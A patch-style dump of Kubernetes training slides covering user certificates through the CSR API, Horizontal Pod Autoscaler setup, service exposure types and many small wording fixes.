|
||||
|
||||
## The CSR API
|
||||
|
||||
- The Kubernetes API has a CertificateSigningRequest resource type
|
||||
|
||||
(we can list them with e.g. `kubectl get csr`)
|
||||
|
||||
- We can create a CSR object
|
||||
|
||||
(= upload a CSR to the Kubernetes API)
|
||||
|
||||
- Then, using the Kubernetes API, we can approve/deny the request
|
||||
|
||||
- If we approve the request, the Kubernetes API generates a certificate
|
||||
|
||||
- The certificate gets attached to the CSR object and can be retrieved
|
||||
|
||||
---
|
||||
|
||||
## Using the CSR API
|
||||
|
||||
- We will show how to use the CSR API to obtain user certificates
|
||||
|
||||
- This will be a rather complex demo
|
||||
|
||||
- ... And yet, we will take a few shortcuts to simplify it
|
||||
|
||||
(but it will illustrate the general idea)
|
||||
|
||||
- The demo also won't be automated
|
||||
|
||||
(we would have to write extra code to make it fully functional)
|
||||
|
||||
---
|
||||
|
||||
## General idea
|
||||
|
||||
- We will create a Namespace named "users"
|
||||
|
||||
- Each user will get a ServiceAccount in that Namespace
|
||||
|
||||
- That ServiceAccount will give read/write access to *one* CSR object
|
||||
|
||||
- Users will use that ServiceAccount's token to submit a CSR
|
||||
|
||||
- We will approve the CSR (or not)
|
||||
|
||||
- Users can then retrieve their certificate from their CSR object
|
||||
|
||||
- ...And use that certificate for subsequent interactions
|
||||
|
||||
---
|
||||
|
||||
## Resource naming
|
||||
|
||||
For a user named `jean.doe`, we will have:
|
||||
|
||||
- ServiceAccount `jean.doe` in Namespace `users`
|
||||
|
||||
- CertificateSigningRequest `users:jean.doe`
|
||||
|
||||
- ClusterRole `users:jean.doe` giving read/write access to that CSR
|
||||
|
||||
- ClusterRoleBinding `users:jean.doe` binding ClusterRole and ServiceAccount
|
||||
|
||||
---
|
||||
|
||||
## Creating the user's resources
|
||||
|
||||
.warning[If you want to use another name than `jean.doe`, update the YAML file!]
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the global namespace for all users:
|
||||
```bash
|
||||
kubectl create namespace users
|
||||
```
|
||||
|
||||
- Create the ServiceAccount, ClusterRole, ClusterRoleBinding for `jean.doe`:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/users:jean.doe.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Extracting the user's token
|
||||
|
||||
- Let's obtain the user's token and give it to them
|
||||
|
||||
(the token will be their password)
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the user's secrets:
|
||||
```bash
|
||||
kubectl --namespace=users describe serviceaccount jean.doe
|
||||
```
|
||||
|
||||
- Show the user's token:
|
||||
```bash
|
||||
kubectl --namespace=users describe secret `jean.doe-token-xxxxx`
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Configure `kubectl` to use the token
|
||||
|
||||
- Let's create a new context that will use that token to access the API
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add a new identity to our kubeconfig file:
|
||||
```bash
|
||||
kubectl config set-credentials token:jean.doe --token=...
|
||||
```
|
||||
|
||||
- Add a new context using that identity:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user=token:jean.doe --cluster=kubernetes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Access the API with the token
|
||||
|
||||
- Let's check that our access rights are set properly
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to access any resource:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
(This should tell us "Forbidden")
|
||||
|
||||
- Try to access "our" CertificateSigningRequest:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe
|
||||
```
|
||||
(This should tell us "NotFound")
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create a key and a CSR
|
||||
|
||||
- There are many tools to generate TLS keys and CSRs
|
||||
|
||||
- Let's use OpenSSL; it's not the best one, but it's installed everywhere
|
||||
|
||||
(many people prefer cfssl, easyrsa, or other tools; that's fine too!)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate the key and certificate signing request:
|
||||
```bash
|
||||
openssl req -newkey rsa:2048 -nodes -keyout key.pem \
|
||||
-new -subj /CN=jean.doe/O=devs/ -out csr.pem
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The command above generates:
|
||||
|
||||
- a 2048-bit RSA key, without encryption, stored in key.pem
|
||||
- a CSR for the name `jean.doe` in group `devs`
|
||||
|
||||
---
|
||||
|
||||
## Inside the Kubernetes CSR object
|
||||
|
||||
- The Kubernetes CSR object is a thin wrapper around the CSR PEM file
|
||||
|
||||
- The PEM file needs to be encoded to base64 on a single line
|
||||
|
||||
(we will use `base64 -w0` for that purpose)
|
||||
|
||||
- The Kubernetes CSR object also needs to list the right "usages"
|
||||
|
||||
(these are flags indicating how the certificate can be used)
|
||||
|
||||
---
|
||||
|
||||
## Sending the CSR to Kubernetes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Generate and create the CSR resource:
|
||||
```bash
|
||||
kubectl apply -f - <<EOF
|
||||
apiVersion: certificates.k8s.io/v1beta1
|
||||
kind: CertificateSigningRequest
|
||||
metadata:
|
||||
name: users:jean.doe
|
||||
spec:
|
||||
request: $(base64 -w0 < csr.pem)
|
||||
usages:
|
||||
- digital signature
|
||||
- key encipherment
|
||||
- client auth
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adjusting certificate expiration
|
||||
|
||||
- By default, the CSR API generates certificates valid 1 year
|
||||
|
||||
- We want to generate short-lived certificates, so we will lower that to 1 hour
|
||||
|
||||
- Fow now, this is configured [through an experimental controller manager flag](https://github.com/kubernetes/kubernetes/issues/67324)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the static pod definition for the controller manager:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-controller-manager.yaml
|
||||
```
|
||||
|
||||
- In the list of flags, add the following line:
|
||||
```bash
|
||||
- --experimental-cluster-signing-duration=1h
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Verifying and approving the CSR
|
||||
|
||||
- Let's inspect the CSR, and if it is valid, approve it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to `cluster-admin`:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Inspect the CSR:
|
||||
```bash
|
||||
kubectl describe csr users:jean.doe
|
||||
```
|
||||
|
||||
- Approve it:
|
||||
```bash
|
||||
kubectl certificate approve users:jean.doe
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Obtaining the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Switch back to the user's identity:
|
||||
```bash
|
||||
kctx -
|
||||
```
|
||||
|
||||
- Retrieve the updated CSR object and extract the certificate:
|
||||
```bash
|
||||
kubectl get csr users:jean.doe \
|
||||
-o jsonpath={.status.certificate} \
|
||||
| base64 -d > cert.pem
|
||||
```
|
||||
|
||||
- Inspect the certificate:
|
||||
```bash
|
||||
openssl x509 -in cert.pem -text -noout
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the key and certificate to kubeconfig:
|
||||
```bash
|
||||
kubectl config set-credentials cert:jean.doe --embed-certs \
|
||||
--client-certificate=cert.pem --client-key=key.pem
|
||||
```
|
||||
|
||||
- Update the user's context to use the key and cert to authenticate:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user cert:jean.doe
|
||||
```
|
||||
|
||||
- Confirm that we are seen as `jean.doe` (but don't have permissions):
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's missing?
|
||||
|
||||
We have just shown, step by step, a method to issue short-lived certificates for users.
|
||||
|
||||
To be usable in real environments, we would need to add:
|
||||
|
||||
- a kubectl helper to automatically generate the CSR and obtain the cert
|
||||
|
||||
(and transparently renew the cert when needed)
|
||||
|
||||
- a Kubernetes controller to automatically validate and approve CSRs
|
||||
|
||||
(checking that the subject and groups are valid)
|
||||
|
||||
- a way for the users to know the groups to add to their CSR
|
||||
|
||||
(e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
|
||||
|
||||
---
|
||||
|
||||
## Is this realistic?
|
||||
|
||||
- Larger organizations typically integrate with their own directory
|
||||
|
||||
- The general principle, however, is the same:
|
||||
|
||||
- users have long-term credentials (password, token, ...)
|
||||
|
||||
- they use these credentials to obtain other, short-lived credentials
|
||||
|
||||
- This provides enhanced security:
|
||||
|
||||
- the long-term credentials can use long passphrases, 2FA, HSM...
|
||||
|
||||
- the short-term credentials are more convenient to use
|
||||
|
||||
- we get strong security *and* convenience
|
||||
|
||||
- Systems like Vault also have certificate issuance mechanisms
|
||||
@@ -73,18 +73,13 @@
|
||||
|
||||
- Dump the `rng` resource in YAML:
|
||||
```bash
|
||||
kubectl get deploy/rng -o yaml --export >rng.yml
|
||||
kubectl get deploy/rng -o yaml >rng.yml
|
||||
```
|
||||
|
||||
- Edit `rng.yml`
|
||||
|
||||
]
|
||||
|
||||
Note: `--export` will remove "cluster-specific" information, i.e.:
|
||||
- namespace (so that the resource is not tied to a specific namespace)
|
||||
- status and creation timestamp (useless when creating a new resource)
|
||||
- resourceVersion and uid (these would cause... *interesting* problems)
|
||||
|
||||
---
|
||||
|
||||
## "Casting" a resource to another
|
||||
@@ -376,7 +371,7 @@ But ... why do these pods (in particular, the *new* ones) have this `app=rng` la
|
||||
|
||||
- Bottom line: if we remove our `app=rng` label ...
|
||||
|
||||
... The pod "diseappears" for its parent, which re-creates another pod to replace it
|
||||
... The pod "disappears" for its parent, which re-creates another pod to replace it
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -153,5 +153,7 @@ The dashboard will then ask you which authentication you want to use.
|
||||
|
||||
--
|
||||
|
||||
- It introduces new failure modes (like if you try to apply yaml from a link that's no longer valid)
|
||||
- It introduces new failure modes
|
||||
|
||||
(for instance, if you try to apply YAML from a link that's no longer valid)
|
||||
|
||||
|
||||
@@ -1,6 +1,20 @@
|
||||
## Declarative vs imperative in Kubernetes
|
||||
|
||||
- Virtually everything we create in Kubernetes is created from a *spec*
|
||||
- With Kubernetes, we cannot say: "run this container"
|
||||
|
||||
- All we can do is write a *spec* and push it to the API server
|
||||
|
||||
(by creating a resource like e.g. a Pod or a Deployment)
|
||||
|
||||
- The API server will validate that spec (and reject it if it's invalid)
|
||||
|
||||
- Then it will store it in etcd
|
||||
|
||||
- A *controller* will "notice" that spec and act upon it
|
||||
|
||||
---
|
||||
|
||||
## Reconciling state
|
||||
|
||||
- Watch for the `spec` fields in the YAML files later!
|
||||
|
||||
|
||||
@@ -175,7 +175,7 @@ Success!
|
||||
|
||||
]
|
||||
|
||||
So far, so good.
|
||||
We should get `No resources found.` and the `kubernetes` service, respectively.
|
||||
|
||||
Note: the API server automatically created the `kubernetes` service entry.
|
||||
|
||||
@@ -225,7 +225,7 @@ Success?
|
||||
|
||||
]
|
||||
|
||||
Our Deployment is in a bad shape:
|
||||
Our Deployment is in bad shape:
|
||||
```
|
||||
NAME READY UP-TO-DATE AVAILABLE AGE
|
||||
deployment.apps/web 0/1 0 0 2m26s
|
||||
@@ -584,7 +584,7 @@ Our pod is still `Pending`. 🤔
|
||||
|
||||
Which is normal: it needs to be *scheduled*.
|
||||
|
||||
(i.e., something needs to decide on which node it should go.)
|
||||
(i.e., something needs to decide which node it should go on.)
|
||||
|
||||
---
|
||||
|
||||
@@ -658,7 +658,7 @@ class: extra-details
|
||||
|
||||
- This is actually how the scheduler works!
|
||||
|
||||
- It watches pods, takes scheduling decisions, creates Binding objects
|
||||
- It watches pods, makes scheduling decisions, and creates Binding objects
|
||||
|
||||
---
|
||||
|
||||
@@ -686,7 +686,7 @@ We should see the `Welcome to nginx!` page.
|
||||
|
||||
## Exposing our Deployment
|
||||
|
||||
- We can now create a Service associated to this Deployment
|
||||
- We can now create a Service associated with this Deployment
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -711,11 +711,11 @@ This won't work. We need kube-proxy to enable internal communication.
|
||||
|
||||
## Starting kube-proxy
|
||||
|
||||
- kube-proxy also needs to connect to API server
|
||||
- kube-proxy also needs to connect to the API server
|
||||
|
||||
- It can work with the `--master` flag
|
||||
|
||||
(even though that will be deprecated in the future)
|
||||
(although that will be deprecated in the future)
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -832,6 +832,6 @@ class: extra-details
|
||||
|
||||
- By default, the API server expects to be running directly on the nodes
|
||||
|
||||
(it could be as a bare process, or in a container/pod using host network)
|
||||
(it could be as a bare process, or in a container/pod using the host network)
|
||||
|
||||
- ... And it expects to be listening on port 6443 with TLS
|
||||
|
||||
@@ -61,7 +61,7 @@ There are many possibilities!
|
||||
|
||||
- creates a new custom type, `Remote`, exposing a git+ssh server
|
||||
|
||||
- deploy by pushing YAML or Helm Charts to that remote
|
||||
- deploy by pushing YAML or Helm charts to that remote
|
||||
|
||||
- Replacing built-in types with CRDs
|
||||
|
||||
@@ -117,7 +117,7 @@ Examples:
|
||||
|
||||
## Admission controllers
|
||||
|
||||
- When a Pod is created, it is associated to a ServiceAccount
|
||||
- When a Pod is created, it is associated with a ServiceAccount
|
||||
|
||||
(even if we did not specify one explicitly)
|
||||
|
||||
@@ -163,7 +163,7 @@ class: pic
|
||||
|
||||
- These webhooks can be *validating* or *mutating*
|
||||
|
||||
- Webhooks can be setup dynamically (without restarting the API server)
|
||||
- Webhooks can be set up dynamically (without restarting the API server)
|
||||
|
||||
- To setup a dynamic admission webhook, we create a special resource:
|
||||
|
||||
@@ -171,7 +171,7 @@ class: pic
|
||||
|
||||
- These resources are created and managed like other resources
|
||||
|
||||
(i.e. `kubectl create`, `kubectl get` ...)
|
||||
(i.e. `kubectl create`, `kubectl get`...)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -234,6 +234,6 @@
|
||||
|
||||
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
|
||||
|
||||
- Gitkube can also deploy Helm Charts
|
||||
- Gitkube can also deploy Helm charts
|
||||
|
||||
(instead of raw YAML files)
|
||||
|
||||
@@ -108,7 +108,7 @@
|
||||
|
||||
(as opposed to merely started)
|
||||
|
||||
- Containers in a broken state gets killed and restarted
|
||||
- Containers in a broken state get killed and restarted
|
||||
|
||||
(instead of serving errors or timeouts)
|
||||
|
||||
|
||||
@@ -158,7 +158,7 @@ Where do these `--set` options come from?
|
||||
|
||||
]
|
||||
|
||||
The chart's metadata includes an URL to the project's home page.
|
||||
The chart's metadata includes a URL to the project's home page.
|
||||
|
||||
(Sometimes it conveniently points to the documentation for the chart.)
|
||||
|
||||
|
||||
245
slides/k8s/horizontal-pod-autoscaler.md
Normal file
245
slides/k8s/horizontal-pod-autoscaler.md
Normal file
@@ -0,0 +1,245 @@
|
||||
# The Horizontal Pod Autoscaler
|
||||
|
||||
- What is the Horizontal Pod Autoscaler, or HPA?
|
||||
|
||||
- It is a controller that can perform *horizontal* scaling automatically
|
||||
|
||||
- Horizontal scaling = changing the number of replicas
|
||||
|
||||
(adding/removing pods)
|
||||
|
||||
- Vertical scaling = changing the size of individual replicas
|
||||
|
||||
(increasing/reducing CPU and RAM per pod)
|
||||
|
||||
- Cluster scaling = changing the size of the cluster
|
||||
|
||||
(adding/removing nodes)
|
||||
|
||||
---
|
||||
|
||||
## Principle of operation
|
||||
|
||||
- Each HPA resource (or "policy") specifies:
|
||||
|
||||
- which object to monitor and scale (e.g. a Deployment, ReplicaSet...)
|
||||
|
||||
- min/max scaling ranges (the max is a safety limit!)
|
||||
|
||||
- a target resource usage (e.g. the default is CPU=80%)
|
||||
|
||||
- The HPA continuously monitors the CPU usage for the related object
|
||||
|
||||
- It computes how many pods should be running:
|
||||
|
||||
`TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)`
|
||||
|
||||
- It scales the related object up/down to this target number of pods
|
||||
|
||||
---
|
||||
|
||||
## Pre-requirements
|
||||
|
||||
- The metrics server needs to be running
|
||||
|
||||
(i.e. we need to be able to see pod metrics with `kubectl top pods`)
|
||||
|
||||
- The pods that we want to autoscale need to have resource requests
|
||||
|
||||
(because the target CPU% is not absolute, but relative to the request)
|
||||
|
||||
- The latter actually makes a lot of sense:
|
||||
|
||||
- if a Pod doesn't have a CPU request, it might be using 10% of CPU...
|
||||
|
||||
- ...but only because there is no CPU time available!
|
||||
|
||||
- this makes sure that we won't add pods to nodes that are already resource-starved
|
||||
|
||||
---
|
||||
|
||||
## Testing the HPA
|
||||
|
||||
- We will start a CPU-intensive web service
|
||||
|
||||
- We will send some traffic to that service
|
||||
|
||||
- We will create an HPA policy
|
||||
|
||||
- The HPA will automatically scale up the service for us
|
||||
|
||||
---
|
||||
|
||||
## A CPU-intensive web service
|
||||
|
||||
- Let's use `jpetazzo/busyhttp`
|
||||
|
||||
(it is a web server that will use 1s of CPU for each HTTP request)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy the web server:
|
||||
```bash
|
||||
kubectl create deployment busyhttp --image=jpetazzo/busyhttp
|
||||
```
|
||||
|
||||
- Expose it with a ClusterIP service:
|
||||
```bash
|
||||
kubectl expose deployment busyhttp --port=80
|
||||
```
|
||||
|
||||
- Get the ClusterIP allocated to the service:
|
||||
```bash
|
||||
kubectl get svc busyhttp
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Monitor what's going on
|
||||
|
||||
- Let's start a bunch of commands to watch what is happening
|
||||
|
||||
.exercise[
|
||||
|
||||
- Monitor pod CPU usage:
|
||||
```bash
|
||||
watch kubectl top pods
|
||||
```
|
||||
|
||||
- Monitor service latency:
|
||||
```bash
|
||||
httping http://`ClusterIP`/
|
||||
```
|
||||
|
||||
- Monitor cluster events:
|
||||
```bash
|
||||
kubectl get events -w
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Send traffic to the service
|
||||
|
||||
- We will use `ab` (Apache Bench) to send traffic
|
||||
|
||||
.exercise[
|
||||
|
||||
- Send a lot of requests to the service, with a concurrency level of 3:
|
||||
```bash
|
||||
ab -c 3 -n 100000 http://`ClusterIP`/
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The latency (reported by `httping`) should increase above 3s.
|
||||
|
||||
The CPU utilization should increase to 100%.
|
||||
|
||||
(The server is single-threaded and won't go above 100%.)
|
||||
|
||||
---
|
||||
|
||||
## Create an HPA policy
|
||||
|
||||
- There is a helper command to do that for us: `kubectl autoscale`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the HPA policy for the `busyhttp` deployment:
|
||||
```bash
|
||||
kubectl autoscale deployment busyhttp --max=10
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
By default, it will assume a target of 80% CPU usage.
|
||||
|
||||
This can also be set with `--cpu-percent=`.
|
||||
|
||||
--
|
||||
|
||||
*The autoscaler doesn't seem to work. Why?*
|
||||
|
||||
---
|
||||
|
||||
## What did we miss?
|
||||
|
||||
- The events stream gives us a hint, but to be honest, it's not very clear:
|
||||
|
||||
`missing request for cpu`
|
||||
|
||||
- We forgot to specify a resource request for our Deployment!
|
||||
|
||||
- The HPA target is not an absolute CPU%
|
||||
|
||||
- It is relative to the CPU requested by the pod
|
||||
|
||||
---
|
||||
|
||||
## Adding a CPU request
|
||||
|
||||
- Let's edit the deployment and add a CPU request
|
||||
|
||||
- Since our server can use up to 1 core, let's request 1 core
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the Deployment definition:
|
||||
```bash
|
||||
kubectl edit deployment busyhttp
|
||||
```
|
||||
|
||||
- In the `containers` list, add the following block:
|
||||
```yaml
|
||||
resources:
|
||||
requests:
|
||||
cpu: "1"
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
- After saving and quitting, a rolling update happens
|
||||
|
||||
(if `ab` or `httping` exits, make sure to restart it)
|
||||
|
||||
- It will take a minute or two for the HPA to kick in:
|
||||
|
||||
- the HPA runs every 30 seconds by default
|
||||
|
||||
- it needs to gather metrics from the metrics server first
|
||||
|
||||
- If we scale further up (or down), the HPA will react after a few minutes:
|
||||
|
||||
- it won't scale up if it already scaled in the last 3 minutes
|
||||
|
||||
- it won't scale down if it already scaled in the last 5 minutes
|
||||
|
||||
---
|
||||
|
||||
## What about other metrics?
|
||||
|
||||
- The HPA in API group `autoscaling/v1` only supports CPU scaling
|
||||
|
||||
- The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups:
|
||||
|
||||
- metrics.k8s.io, aka metrics server (per-Pod CPU and RAM)
|
||||
|
||||
- custom.metrics.k8s.io, custom metrics per Pod
|
||||
|
||||
- external.metrics.k8s.io, external metrics (not associated to Pods)
|
||||
|
||||
- Kubernetes doesn't implement any of these API groups
|
||||
|
||||
- Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis)
|
||||
|
||||
- The metrics provided by metrics server are standard; everything else is custom
|
||||
|
||||
- For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8)
|
||||
@@ -88,7 +88,7 @@
|
||||
|
||||
- the control loop watches over ingress resources, and configures the LB accordingly
|
||||
|
||||
- Step 2: setup DNS
|
||||
- Step 2: set up DNS
|
||||
|
||||
- associate DNS entries with the load balancer address
|
||||
|
||||
@@ -126,7 +126,7 @@
|
||||
|
||||
- We could use pods specifying `hostPort: 80`
|
||||
|
||||
... but with most CNI plugins, this [doesn't work or require additional setup](https://github.com/kubernetes/kubernetes/issues/23920)
|
||||
... but with most CNI plugins, this [doesn't work or requires additional setup](https://github.com/kubernetes/kubernetes/issues/23920)
|
||||
|
||||
- We could use a `NodePort` service
|
||||
|
||||
@@ -142,7 +142,7 @@
|
||||
|
||||
(sometimes called sandbox or network sandbox)
|
||||
|
||||
- An IP address is associated to the pod
|
||||
- An IP address is assigned to the pod
|
||||
|
||||
- This IP address is routed/connected to the cluster network
|
||||
|
||||
@@ -239,7 +239,7 @@ class: extra-details
|
||||
|
||||
- an error condition on the node
|
||||
<br/>
|
||||
(for instance: "disk full", do not start new pods here!)
|
||||
(for instance: "disk full," do not start new pods here!)
|
||||
|
||||
- The `effect` can be:
|
||||
|
||||
@@ -501,11 +501,11 @@ spec:
|
||||
|
||||
(as long as it has access to the cluster subnet)
|
||||
|
||||
- This allows to use external (hardware, physical machines...) load balancers
|
||||
- This allows the use of external (hardware, physical machines...) load balancers
|
||||
|
||||
- Annotations can encode special features
|
||||
|
||||
(rate-limiting, A/B testing, session stickiness, etc.)
|
||||
(rate-limiting, A/B testing, session stickiness, etc.)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -81,7 +81,7 @@ Under the hood: `kube-proxy` is using a userland proxy and a bunch of `iptables`
|
||||
|
||||
.exercise[
|
||||
|
||||
- In another window, watch the pods (to see when they will be created):
|
||||
- In another window, watch the pods (to see when they are created):
|
||||
```bash
|
||||
kubectl get pods -w
|
||||
```
|
||||
@@ -276,3 +276,21 @@ error: the server doesn't have a resource type "endpoint"
|
||||
- There is no `endpoint` object: `type Endpoints struct`
|
||||
|
||||
- The type doesn't represent a single endpoint, but a list of endpoints
|
||||
|
||||
---
|
||||
|
||||
## Exposing services to the outside world
|
||||
|
||||
- The default type (ClusterIP) only works for internal traffic
|
||||
|
||||
- If we want to accept external traffic, we can use one of these:
|
||||
|
||||
- NodePort (expose a service on a TCP port between 30000-32768)
|
||||
|
||||
- LoadBalancer (provision a cloud load balancer for our service)
|
||||
|
||||
- ExternalIP (use one node's external IP address)
|
||||
|
||||
- Ingress (a special mechanism for HTTP services)
|
||||
|
||||
*We'll see NodePorts and Ingresses more in detail later.*
|
||||
|
||||
@@ -79,6 +79,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Exploring types and definitions
|
||||
|
||||
- We can list all available resource types by running `kubectl api-resources`
|
||||
@@ -102,9 +104,11 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Introspection vs. documentation
|
||||
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.14/)
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/#api-reference)
|
||||
|
||||
- The API documentation is usually easier to read, but:
|
||||
|
||||
@@ -128,7 +132,7 @@
|
||||
|
||||
- short (e.g. `no`, `svc`, `deploy`)
|
||||
|
||||
- Some resources do not have a short names
|
||||
- Some resources do not have a short name
|
||||
|
||||
- `Endpoints` only have a plural form
|
||||
|
||||
@@ -462,4 +466,4 @@ class: extra-details
|
||||
- For more details, see [KEP-0009] or the [node controller documentation]
|
||||
|
||||
[KEP-0009]: https://github.com/kubernetes/enhancements/blob/master/keps/sig-node/0009-node-heartbeat.md
|
||||
[node controller documentation]: https://kubernetes.io/docs/concepts/architecture/nodes/#node-controller
|
||||
[node controller documentation]: https://kubernetes.io/docs/concepts/architecture/nodes/#node-controller
|
||||
|
||||
@@ -77,9 +77,9 @@ If we wanted to talk to the API, we would need to:
|
||||
|
||||
- This is a great tool to learn and experiment with the Kubernetes API
|
||||
|
||||
- ... And for serious usages as well (suitable for one-shot scripts)
|
||||
- ... And for serious uses as well (suitable for one-shot scripts)
|
||||
|
||||
- For unattended use, it is better to create a [service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
|
||||
- For unattended use, it's better to create a [service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -320,6 +320,8 @@ We could! But the *deployment* would notice it right away, and scale back to the
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
### Streaming logs of many pods
|
||||
|
||||
- Let's see what happens if we try to stream the logs for more than 5 pods
|
||||
@@ -347,6 +349,8 @@ use --max-log-requests to increase the limit
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Why can't we stream the logs of many pods?
|
||||
|
||||
- `kubectl` opens one connection to the API server per pod
|
||||
|
||||
@@ -16,6 +16,8 @@
|
||||
|
||||
- each pod is aware of its IP address (no NAT)
|
||||
|
||||
- pod IP addresses are assigned by the network implementation
|
||||
|
||||
- Kubernetes doesn't mandate any particular implementation
|
||||
|
||||
---
|
||||
@@ -30,7 +32,7 @@
|
||||
|
||||
- No new protocol
|
||||
|
||||
- Pods cannot move from a node to another and keep their IP address
|
||||
- The network implementation can decide how to allocate addresses
|
||||
|
||||
- IP addresses don't have to be "portable" from a node to another
|
||||
|
||||
@@ -52,7 +54,7 @@
|
||||
|
||||
(15 are listed in the Kubernetes documentation)
|
||||
|
||||
- Pods have level 3 (IP) connectivity, but *services* are level 4
|
||||
- Pods have level 3 (IP) connectivity, but *services* are level 4 (TCP or UDP)
|
||||
|
||||
(Services map to a single UDP or TCP port; no port ranges or arbitrary IP packets)
|
||||
|
||||
@@ -82,13 +84,17 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The Container Network Interface (CNI)
|
||||
|
||||
- The CNI has a well-defined [specification](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration) for network plugins
|
||||
- Most Kubernetes clusters use CNI "plugins" to implement networking
|
||||
|
||||
- When a pod is created, Kubernetes delegates the network setup to CNI plugins
|
||||
- When a pod is created, Kubernetes delegates the network setup to these plugins
|
||||
|
||||
- Typically, a CNI plugin will:
|
||||
(it can be a single plugin, or a combination of plugins, each doing one task)
|
||||
|
||||
- Typically, CNI plugins will:
|
||||
|
||||
- allocate an IP address (by calling an IPAM plugin)
|
||||
|
||||
@@ -96,8 +102,46 @@
|
||||
|
||||
- configure the interface as well as required routes etc.
|
||||
|
||||
- Using multiple plugins can be done with "meta-plugins" like CNI-Genie or Multus
|
||||
---
|
||||
|
||||
- Not all CNI plugins are equal
|
||||
class: extra-details
|
||||
|
||||
(e.g. they don't all implement network policies, which are required to isolate pods)
|
||||
## Multiple moving parts
|
||||
|
||||
- The "pod-to-pod network" or "pod network":
|
||||
|
||||
- provides communication between pods and nodes
|
||||
|
||||
- is generally implemented with CNI plugins
|
||||
|
||||
- The "pod-to-service network":
|
||||
|
||||
- provides internal communication and load balancing
|
||||
|
||||
- is generally implemented with kube-proxy (or e.g. kube-router)
|
||||
|
||||
- Network policies:
|
||||
|
||||
- provide firewalling and isolation
|
||||
|
||||
- can be bundled with the "pod network" or provided by another component
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Even more moving parts
|
||||
|
||||
- Inbound traffic can be handled by multiple components:
|
||||
|
||||
- something like kube-proxy or kube-router (for NodePort services)
|
||||
|
||||
- load balancers (ideally, connected to the pod network)
|
||||
|
||||
- It is possible to use multiple pod networks in parallel
|
||||
|
||||
(with "meta-plugins" like CNI-Genie or Multus)
|
||||
|
||||
- Some solutions can fill multiple roles
|
||||
|
||||
(e.g. kube-router can be set up to provide the pod network and/or network policies and/or replace kube-proxy)
|
||||
|
||||
244
slides/k8s/kubercoins.md
Normal file
244
slides/k8s/kubercoins.md
Normal file
@@ -0,0 +1,244 @@
|
||||
# Deploying a sample application
|
||||
|
||||
- We will connect to our new Kubernetes cluster
|
||||
|
||||
- We will deploy a sample application, "DockerCoins"
|
||||
|
||||
- That app features multiple micro-services and a web UI
|
||||
|
||||
---
|
||||
|
||||
## Connecting to our Kubernetes cluster
|
||||
|
||||
- Our cluster has multiple nodes named `node1`, `node2`, etc.
|
||||
|
||||
- We will do everything from `node1`
|
||||
|
||||
- We have SSH access to the other nodes, but won't need it
|
